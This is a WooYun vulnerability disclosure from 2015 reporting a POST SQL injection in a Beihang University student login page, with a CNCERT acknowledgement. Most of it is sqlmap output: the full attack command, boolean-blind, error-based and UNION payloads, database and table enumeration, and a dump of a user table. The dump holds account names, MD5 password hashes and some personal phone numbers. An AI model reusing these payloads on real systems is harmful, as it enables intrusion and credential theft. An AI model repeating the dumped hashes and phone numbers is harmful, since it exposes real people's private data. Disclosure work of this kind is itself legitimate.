当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151770

漏洞标题:北京航空航天大学某站存在POST型SQL注射漏洞(admin等用户密码及电话号码泄露)

相关厂商:北京航空航天大学

漏洞作者: 路人甲

提交时间:2015-11-04 15:46

修复时间:2015-12-21 15:18

公开时间:2015-12-21 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

北京航空航天大学(简称北航)成立于1952年,由当时的清华大学、北洋大学、厦门大学、四川大学等八所院校的航空系合并组建,是新中国第一所航空航天高等学府,现隶属于工业和信息化部。学校分为学院路校区和沙河校区,占地3000亩,总建筑面积150余万平方米。自建校以来,北航一直是国家重点建设的高校,是全国第一批16所重点高校之一,也是80年代恢复学位制度后全国第一批设立研究生院的22所高校之一,首批进入“211工程”,2001年进入“985工程”。经过六十年的建设与发展,学校基本形成了研究型大学的核心竞争力,内在凝聚力和国内外影响力得到显著提升,跻身国内高水平大学的第一方阵。

详细说明:

地址:http://**.**.**.**/student/my/login

python sqlmap.py -u "http://**.**.**.**/student/my/login" --form -p LoginForm[username] --technique=BEU --random-agent --batch -D inspection -T in_user -C user_name,user_id,user_pwd,user_phone,user_qq,user_email,user_nkname --dump

漏洞证明:

---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
current user: 'inspection@localhost'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'inspection'@'localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] inspection
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
[37 tables]
+---------------------------+
| YiiSession |
| in_application |
| in_arrange |
| in_arrangebak |
| in_assignxy |
| in_attendance |
| in_authassignment |
| in_authitem |
| in_authitemchild |
| in_config |
| in_course |
| in_courseallocation |
| in_courseallocationbak |
| in_coursebak |
| in_delayed |
| in_emapp |
| in_examinationarrangement |
| in_exemption |
| in_files |
| in_information |
| in_lookup |
| in_organization |
| in_otinfo |
| in_pici |
| in_precord |
| in_professional |
| in_professionalbak |
| in_province |
| in_review |
| in_scrollpicture |
| in_setconfig |
| in_sjpici |
| in_students |
| in_students_manage |
| in_teacher |
| in_user |
| in_vestigate |
+---------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
Table: in_user
[27 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| user_adderss | varchar(100) |
| user_authorize | varchar(500) |
| user_bddm | varchar(100) |
| user_email | varchar(30) |
| user_headimg | varchar(100) |
| user_id | int(11) unsigned |
| user_iparr | varchar(3000) |
| user_isdel | int(11) |
| user_lastip | varchar(50) |
| user_lasttime | int(11) |
| user_loginnum | int(11) |
| user_msn | varchar(100) |
| user_name | varchar(30) |
| user_nkname | varchar(100) |
| user_online | int(11) |
| user_organization | int(11) |
| user_phone | varchar(50) |
| user_pwd | varchar(50) |
| user_qq | varchar(50) |
| user_regtime | int(11) |
| user_role | int(11) |
| user_rolebz | varchar(100) |
| user_sfqz | varchar(100) |
| user_status | int(11) |
| user_tel | varchar(50) |
| user_tel2 | varchar(50) |
| user_webset | varchar(100) |
+-------------------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
Table: in_user
[37 entries]
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+
| user_name | user_id | user_pwd | user_phone | user_qq | user_email | user_nkname |
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+
| admin | 1 | 82a4e6229c04c7eea5270cee9219cec8 | NULL | NULL | <blank> | čś\x85级玥ç\x90\x86ĺ\x91\x98 |
| sysadmin | 2 | 8b803df8479a34c942a39ec906ca6e81 | NULL | NULL | <blank> | çłťçť\x9f玥ç\x90\x86ĺ\x91\x98 |
| hdjgzx | 3 | 5ee4dad4aaa2154c58c325f257d21bfc | <blank> | NULL | <blank> | ĺ\x8d\x8eä¸\x9c玥ç\x90\x86ä¸\x8eć\x9c\x8dĺ\x8aĄä¸­ĺż\x83 |
| hdjgzx1 | 4 | 5ee4dad4aaa2154c58c325f257d21bfc | NULL | NULL | NULL | ĺ\x8d\x8eä¸\x9cç\x9b\x91玥中ĺż\x83 |
| bjshenhe | 5 | 14a2ee741534eef7c80edbe89de55924 | <blank> | NULL | <blank> | ĺ\x8c\x97亏厥核玥ç\x90\x86 |
| 1000642001 | 10 | 4cd034305b3027762ee2ebfa15edbcb2 | <blank> | NULL | <blank> | ĺ¤\x8fć\x98Ľçş˘ |
| shuangxin | 11 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | é\x83­ä¸šç\x90´ |
| 1000642003 | 12 | 00044b51262110c94868789ebfb089e8 | <blank> | NULL | <blank> | ć\x88´é\x94\x90 |
| quanhao | 13 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | topwater |
| xuhuizx | 14 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | allround |
| 10006888 | 15 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | gxl |
| acking | 17 | fcea920f7412b5da7be0cf42b8c93759 | <blank> | NULL | <blank> | acking |
| 1000652101 | 18 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | ć˝\x98ç­ąäş\x91 |
| 1000642004 | 19 | a5407e92b245b0c06017c9e6d381e6b5 | <blank> | NULL | <blank> | é\x99\x88č\x8f\x8a |
| chenju01 | 20 | eeef89774499b8aab48a9e477c0a0794 | <blank> | NULL | <blank> | é\x99\x88č\x8f\x8a |
| 1000641801 | 21 | 80c4b59647a5057d6f463ba95bf0063b | <blank> | NULL | <blank> | ç\x8e\x8bç\x8fŽč\x93\x93 |
| 1000652201 | 22 | 6d8a4276ee71937f560b4ff50651cfe8 | <blank> | NULL | <blank> | 莸波ĺ\x8b\x87 |
| 1000652101 | 24 | c16cdbf424606c50ccd1184361d20ac5 | <blank> | NULL | <blank> | ä˝\x95é\x92° |
| 1000640401 | 25 | ac1c2e86c2a8fb808325d8200d82b0c8 | <blank> | NULL | <blank> | çĽ\x81ĺž\x97ć\x98\x8e |
| 1000640301 | 26 | 20f58afd3043cdaf169ca9f2d3412bd2 | <blank> | NULL | <blank> | ç\x8e\x8bć\x96\x87äź\x9f |
| 1000640501 | 27 | 90aedecc1034df83a9159f85cee09a80 | 1897999500 | NULL | <blank> | ĺ\x88\x98çŁ\x8a |
| 1000645101 | 28 | a6a9b25e58a394ad7d7aae309226c8a5 | <blank> | NULL | <blank> | é\x82ąĺ°\x8fĺšł |
| 1000645001 | 29 | 9c1a8a30ac217bb9153e77b991aa6cf1 | <blank> | NULL | <blank> | čľľĺŠ\x95 |
| 1000642101 | 30 | fe1ee07a4acf16deb81efbef42c7b119 | <blank> | NULL | <blank> | ĺ§\x9a鲲 |
| qianlaoshi01 | 31 | cf5d7313034fdff73bdf5cd044916141 | <blank> | NULL | <blank> | ć˝\x9cçť´ĺ\x85´ |
| 1000642002 | 32 | 04ad64c1bfa92ff9061ddf91b797ff9b | <blank> | NULL | <blank> | ĺ­\x99č\x8eš |
| 1000646401 | 33 | c80f865e9abc8b415cbc9701214cb3a1 | <blank> | NULL | <blank> | ć\x9bšĺ\x85śçŤŻ |
| beijing | 34 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | ĺ\x8c\x97亏 |
| bhceshi | 35 | d6a21b3940d10ce5753052d5f48c5ee8 | 123456 | NULL | 11111 | cj |
| wuzhenyou | 37 | ae45fcd57b567b6e2ec8f3d5ee73b458 | 13918160512 | NULL | <blank> | é\x99\x88ĺ\x8fś |
| sitadi | 38 | 96e79218965eb72c92a549dd5a330112 | 18918597013 | NULL | <blank> | ç\x8e\x8bć\x85§čś\x85 |
| sitadi | 39 | d04bcd6748b9ceee3063386209fae5e7 | 18918597013 | NULL | 421032151@**.**.**.** | ç\x8e\x8bć\x85§čś\x85 |
| xinshijie | 40 | 96e79218965eb72c92a549dd5a330112 | 13916760738 | NULL | <blank> | ć˘\x81澡ćŚ\x95 |
| xuesen | 41 | 21218cca77804d2ba1922c33e0151105 | 15216604364 | NULL | <blank> | ć\x9d\x9c棎 |
| haowei | 42 | 96e79218965eb72c92a549dd5a330112 | <blank> | NULL | <blank> | é˝\x90丽č\x90\x8d |
| nanhui | 43 | 96e79218965eb72c92a549dd5a330112 | <blank> | NULL | <blank> | é\x83­ä¸šç\x90´ |
| bjceshi | 44 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | éŤ\x98ĺąą |
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 15:17

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无